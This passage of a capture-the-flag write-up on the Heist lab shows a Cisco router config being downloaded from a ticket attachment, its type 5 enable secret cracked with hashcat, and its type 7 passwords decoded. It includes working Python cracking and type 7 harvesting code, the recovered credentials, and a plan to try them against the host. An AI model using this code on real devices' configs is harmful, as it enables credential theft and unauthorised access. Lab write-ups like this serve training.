Webroot


The earlier Nmap scan revealed a web server on port 80. Navigating to the web root redirected me to /login.php, a login page that also offers the option to log in as a guest.

Wappalyzer identified the technologies in use: the site is written in PHP 7.3.1.

config.txt


I logged in as Guest and was redirected to /issues.php. Two usernames are visible, Hazard and Support Admin, the latter carrying the admin badge. Hazard has opened an issue about a problem with his Cisco router and attached the router's configuration file.

┌──(kali㉿kali)-[~/archive/htb/labs/heist]
└─$ wget http://$IP/attachments/config.txt              
--2022-10-10 20:37:00--  http://10.10.10.149/attachments/config.txt
Connecting to 10.10.10.149:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 780 [text/plain]
Saving to: ‘config.txt’
 
config.txt                              100%[==============================================================================>]     780  --.-KB/s    in 0s      
 
2022-10-10 20:37:00 (130 MB/s) - ‘config.txt’ saved [780/780]

I downloaded config.txt with wget.

┌──(kali㉿kali)-[~/archive/htb/labs/heist]
└─$ cat config.txt                                                                     
version 12.2
no service pad
service password-encryption
!
isdn switch-type basic-5ess
!
hostname ios-1
!
security passwords min-length 12
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
!
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
!
!
ip ssh authentication-retries 5
ip ssh version 2
!
!
router bgp 100
 synchronization
 bgp log-neighbor-changes
 bgp dampening
 network 192.168.0.0 mask 300.255.255.0
 timers bgp 3 9
 redistribute connected
!
ip classless
ip route 0.0.0.0 0.0.0.0 192.168.0.1
!
!
access-list 101 permit ip any any
dialer-list 1 protocol ip list 101
!
no ip http server
no ip http secure-server
!
line vty 0 4
 session-timeout 600
 authorization exec SSH
 transport input ssh

It is indeed a configuration file for Cisco IOS.

  • The enable secret is stored as a type 5 hash, which is md5crypt (salted, 1000-round MD5) and can only be attacked offline by guessing: enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
  • Two local accounts have type 7 passwords. Despite the service password-encryption line, type 7 is a reversible obfuscation with a fixed key, so these can be decoded directly rather than cracked: username rout3r password 7 0242114B0E143F015F5D1E161713 and username admin privilege 15 password 7 02375012182C1A1D751618034F36415408 (admin has privilege 15, i.e. full enable-level access)
  • The BGP network statement carries an invalid netmask, since an octet cannot be 300: network 192.168.0.0 mask 300.255.255.0. No wonder the user is having network problems.

I saved the enable secret to a file named hash and ran hashcat in mode 500 (md5crypt) against rockyou.txt on a Windows host, reading both the hash file and the wordlist from my Kali machine over an SMB share:
PS C:\> .\hashcat.exe -a 0 -m 500 \\10.1.1.2\\smb\home\kali\archive\htb\labs\heist\hash \\10.1.1.2\smb\usr\share\wordlists\rockyou.txt  -O --self-test-disable -d 2
hashcat (v6.2.6) starting
 
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
 
Host memory required for this attack: 1383 MB
 
Dictionary cache hit:
* Filename..: \\10.1.1.2\smb\usr\share\wordlists\rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
 
$1$pdQG$o8nrSzsGXeaduXrjlvKc91:stealth1agent
 
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 500 (md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5))
Hash.Target......: $1$pdQG$o8nrSzsGXeaduXrjlvKc91
Time.Started.....: Mon Oct 10 22:47:24 2022 (2 secs)
Time.Estimated...: Mon Oct 10 22:47:26 2022 (0 secs)
Kernel.Feature...: Optimized Kernel
Guess.Base.......: File (\\10.1.1.2\smb\usr\share\wordlists\rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#2.........:  2902.2 kH/s (12.25ms) @ Accel:128 Loops:125 Thr:256 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 3980052/14344385 (27.75%)
Rejected.........: 47892/3980052 (1.20%)
Restore.Point....: 2973052/14344385 (20.73%)
Restore.Sub.#2...: Salt:0 Amplifier:0-1 Iteration:875-1000
Candidate.Engine.: Device Generator
Candidates.#2....: uratok1 -> sassy112
Hardware.Mon.#2..: Temp: 59c Util: 44% Core:1731MHz Mem:5995MHz Bus:8
 
Started: Mon Oct 10 22:47:19 2022
Stopped: Mon Oct 10 22:47:27 2022

Hashcat cracked the Cisco IOS enable secret in a couple of seconds: stealth1agent
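To make clear what hashcat's mode 500 is actually computing, here is an added example (my own code, not part of the original write-up, hashcat or Cisco) in Python: a reference md5crypt implementation that checks candidate passwords against the enable secret from config.txt, run over a short constructed wordlist standing in for rockyou.txt.

```python
# Added example (not from the original write-up): pure-Python md5crypt,
# the algorithm behind IOS "enable secret 5" and hashcat -m 500, used to
# verify a candidate against the hash and to run a tiny dictionary attack.
import hashlib

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _to64(value: int, count: int) -> str:
    """md5crypt's custom base64: emit 6 bits at a time, least significant first."""
    out = ""
    for _ in range(count):
        out += ITOA64[value & 0x3F]
        value >>= 6
    return out


def md5crypt(password: str, salt: str, magic: str = "$1$") -> str:
    """Return the $1$salt$hash string for password (FreeBSD/Cisco type 5)."""
    pw = password.encode()
    sl = salt.encode()[:8]            # the salt is at most 8 characters
    # Initial context: password + magic + salt
    ctx = hashlib.md5(pw + magic.encode() + sl)
    # Alternate digest: password + salt + password
    alt = hashlib.md5(pw + sl + pw).digest()
    # Feed alt in, one byte per password character (wrapping every 16)
    for i in range(len(pw)):
        ctx.update(alt[i % 16:i % 16 + 1])
    # For every bit of len(pw): a NUL byte if the bit is set, else pw[0]
    i = len(pw)
    while i:
        ctx.update(b"\x00" if i & 1 else pw[:1])
        i >>= 1
    final = ctx.digest()
    # 1000 rounds of stretching with a fixed, round-dependent schedule
    for r in range(1000):
        c = hashlib.md5()
        c.update(pw if r & 1 else final)
        if r % 3:
            c.update(sl)
        if r % 7:
            c.update(pw)
        c.update(final if r & 1 else pw)
        final = c.digest()
    # Digest bytes are interleaved in this fixed order before encoding
    s = _to64((final[0] << 16) | (final[6] << 8) | final[12], 4)
    s += _to64((final[1] << 16) | (final[7] << 8) | final[13], 4)
    s += _to64((final[2] << 16) | (final[8] << 8) | final[14], 4)
    s += _to64((final[3] << 16) | (final[9] << 8) | final[15], 4)
    s += _to64((final[4] << 16) | (final[10] << 8) | final[5], 4)
    s += _to64(final[11], 2)
    return f"{magic}{sl.decode()}${s}"


def check(hash_str: str, candidate: str) -> bool:
    """True if candidate hashes to hash_str; the salt is taken from hash_str."""
    magic, salt, _ = hash_str[1:].split("$")   # "1", "pdQG", "o8nr..."
    return md5crypt(candidate, salt, f"${magic}$") == hash_str


def crack(hash_str: str, wordlist):
    """Return the first word in wordlist that matches hash_str, or None."""
    for word in wordlist:
        if check(hash_str, word):
            return word
    return None


ENABLE_SECRET = "$1$pdQG$o8nrSzsGXeaduXrjlvKc91"   # the hash from config.txt
# Constructed mini wordlist in place of rockyou.txt
WORDS = ["password", "cisco123", "stealth1agent", "admin"]

if __name__ == "__main__":
    print(crack(ENABLE_SECRET, WORDS))
```

A pure-Python check like this is far too slow for a real wordlist (hashcat reported about 2.9 MH/s on the GPU above), but it is handy for confirming a single candidate offline, and it shows why type 5 costs roughly a thousand MD5 compressions per guess while the type 7 strings in the same file need no guessing at all.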

While there are plenty of online tools for type 7 strings, I used ciscot7.py, a small Python script that implements the decoding, and pointed it at the config file:

┌──(kali㉿kali)-[~/…/htb/labs/heist/hashes]
└─$ python2 ciscot7.py -f config.txt 
Decrypted password: $uperP@ssword
Decrypted password: Q4)sJu\Y8qz*A3?d

Both type 7 passwords decode instantly, with no cracking involved:

  • rout3r:$uperP@ssword
  • admin:Q4)sJu\Y8qz*A3?d
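For reference, the type 7 scheme itself is a fixed-key XOR, which is why a few lines of code recover these passwords with no wordlist at all. The following is an added example in Python (my own code, not ciscot7.py or anything from Cisco) that decodes and re-encodes type 7 strings and pulls every "password 7" line out of a running-config; the config excerpt is constructed from the two username lines in config.txt.

```python
# Added example (not from the original write-up): Cisco type 7 is a
# fixed-key XOR stream, so it is decoded, not cracked.
import re

# The fixed 53-byte key shared by every IOS image for type 7
TYPE7_KEY = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87"


def type7_decode(encoded: str) -> str:
    """Decode a type 7 string: a 2-digit decimal seed, then hex bytes that are
    XORed with the key starting at that seed (the key index wraps mod 53)."""
    if len(encoded) < 4 or len(encoded) % 2:
        raise ValueError("malformed type 7 string")
    seed = int(encoded[:2])
    data = bytes.fromhex(encoded[2:])
    return bytes(b ^ TYPE7_KEY[(seed + i) % len(TYPE7_KEY)]
                 for i, b in enumerate(data)).decode()


def type7_encode(plain: str, seed: int = 2) -> str:
    """Inverse of type7_decode; seed is the starting key offset (IOS uses 0-15)."""
    out = bytes(ord(c) ^ TYPE7_KEY[(seed + i) % len(TYPE7_KEY)]
                for i, c in enumerate(plain))
    return f"{seed:02d}{out.hex().upper()}"


# Matches "username <name> [privilege N] password 7 <hex>" lines
PASSWORD7 = re.compile(
    r"^\s*username\s+(\S+).*?\bpassword\s+7\s+([0-9A-Fa-f]+)", re.M)


def harvest_type7(config_text: str) -> dict:
    """Return {username: plaintext} for every 'password 7' line in a config."""
    return {user: type7_decode(enc) for user, enc in PASSWORD7.findall(config_text)}


# Constructed excerpt: the two username lines exactly as they appear in config.txt
CONFIG_EXCERPT = """\
service password-encryption
!
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
!
"""

if __name__ == "__main__":
    for user, pw in harvest_type7(CONFIG_EXCERPT).items():
        print(f"{user}:{pw}")
```

Note that "service password-encryption" only turns on this type 7 obfuscation for line and username passwords; anyone who obtains the config, as here via an attachment, gets the plaintext for free. The practitioner fix is "username <name> secret <pw>" (type 5, or type 8/9 on newer images), which stores a salted hash instead.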

Now that I have a handful of usernames (Hazard, Support Admin, rout3r, admin) and three passwords (stealth1agent, $uperP@ssword and Q4)sJu\Y8qz*A3?d), I can try the combinations against the host and see whether any of them match.